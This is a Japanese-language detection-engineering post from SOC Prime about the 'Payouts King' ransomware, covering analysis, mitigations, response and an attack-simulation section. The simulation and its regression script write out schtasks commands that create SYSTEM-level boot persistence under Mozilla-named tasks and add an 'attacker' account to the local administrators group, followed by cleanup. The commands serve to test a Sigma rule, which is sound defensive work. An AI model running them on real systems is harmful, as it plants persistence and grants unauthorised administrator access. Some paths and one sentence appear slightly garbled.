SOC Prime Bias:

17 Apr 2026 14:40 UTC

ペイアウト王、ランサムウェアの王座を狙う

Author Photo
SOC Prime Team linkedin icon フォローする
ペイアウト王、ランサムウェアの王座を狙う
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

調査

ThreatLabzは複数のランサムウェアのサンプルを分析し、マルウェアが使用するカスタムCRCおよびFNV1ハッシュ関数を逆解析し、スケジュールされたタスクを通じた持続性を特定しました。研究者は、暗号化方式、標的とするファイル拡張子、全体的な実行フローも記録しました。分析により、暗号化が始まる前に低レベルのシステムコールを使用して終了しようとするセキュリティ関連プロセスの組み込みリストが明らかになりました。コマンドラインパラメータやファイル拡張子パターンを含む追加の指標がサンプルから直接抽出され、検出とハンティングの努力を支援します。

緩和策

組織は多要素認証を強制し、ソーシャルエンジニアリングの試みに対処するためのユーザートレーニングを行い、Microsoft Teamsやクイックアシストなどのツールの不審な使用を監視する必要があります。防御者はまた、ランサムウェア関連の既知のファイル拡張子をブロックし、Mozillaパスでのスケジュールされたタスクの作成やシステムへの呼び出しを識別できるエンドポイント検出を展開するべきです。 SetFileInformationByHandleFileRenameInfoと共に使います。オフラインバックアップは定期的に行い、シャドウコピーを保護して、暗号化の際の回復オプションを改善すべきです。

対応策

Payouts Kingの活動が検出された場合、影響を受けたシステムを直ちに隔離し、法医学分析のために揮発性メモリとディスクイメージを収集します。調査担当者は、 MozillaUpdateTask and MozillaElevateTaskといった名前のスケジュールされたタスクを確認し、マルウェアに関連するカスタムCRC保護のコマンドライン引数や固有の暗号化ファイル拡張子をハンティングします。回復は、信頼性のあるクリーンなバックアップからのデータ復元に焦点を当てるべきです。セキュリティチームは、特定されたサンプルハッシュを関連する脅威インテリジェンスプラットフォームに提出し、より広範な追跡と防御を支援するべきです。

攻撃フロー

シミュレーション実行

前提条件:テレメトリおよびベースラインのプリフライトチェックが合格している必要があります。

根拠:このセクションでは、検出ルールをトリガーするように設計された敵の技術(TTP)の正確な実行について詳述します。コマンドとナラティブは、特定されたTTPsを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的とします。抽象的または無関係な例は誤診につながります。

  • 攻撃ナラティブとコマンド:

    攻撃者は初期アクセスを取得した後、ランサムウェアがシステムの再起動ごとに実行され、SYSTEM特権を得ることを保証したいと考えています。彼らはサードパーティのツールを導入することを避けるためにネイティブな schtasks.exe バイナリを使用します。最初に、ダミーのランサムウェアペイロードを実行する“UpdateTask”を作成し、その後すぐに特権プロセスを生成して感染チェーンを進める“ElevateTask”を作成して実行します。両方のタスクは Mozilla ネームスペースに配置され、既知のPayouts Kingパターンを模倣します。

    1. UpdateTaskを作成:

      schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaUpdateTask /TR "cmd.exe /c start C:Temppayouts_king.exe"
    2. ElevateTaskを作成:

      schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaElevateTask /TR "cmd.exe /c whoami && net localgroup administrators /add attacker"
    3. ElevateTaskを即時実行:

      schtasks.exe /run /tn MozillaElevateTask
    4. (オプション)タスクが存在することを確認:

      schtasks.exe /query /tn Mozilla* /fo LIST /v

    これらの正確なコマンドラインは、 selection1 and selection2 のSigmaルールの節を満たし、次の条件を満たします: 条件: selection1およびselection2およびnot exclusion.

  • 回帰テストスクリプト:

    # Payouts Kingのスケジュールタスク持続性シミュレーション
    # --------------------------------------------------
    # ステップ1: UpdateTaskを作成(起動時の持続性)
    schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaUpdateTask /TR "cmd.exe /c start C:Temppayouts_king.exe"
    
    # ステップ2: ElevateTaskを作成(特権昇格ヘルパー)
    schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaElevateTask /TR "cmd.exe /c whoami && net localgroup administrators /add attacker"
    
    # ステップ3: ElevateTaskを直ちに実行し、2番目の検出イベントを生成します
    schtasks.exe /run /tn MozillaElevateTask
    
    # ステップ4: 確認の出力(検出には必要ありませんが、オペレーターの可視性のため)
    Write-Host "スケジュールしたタスク作成およびElevateTask実行完了。"
  • クリーンアップコマンド:

    # テストのために作成したタスクを削除
    schtasks.exe /delete /tn MozillaElevateTask /f
    schtasks.exe /delete /tn MozillaUpdateTask /f
    
    # 必要に応じてダミーペイロードを削除
    Remove-Item -Path "C:Temppayouts_king.exe" -ErrorAction SilentlyContinue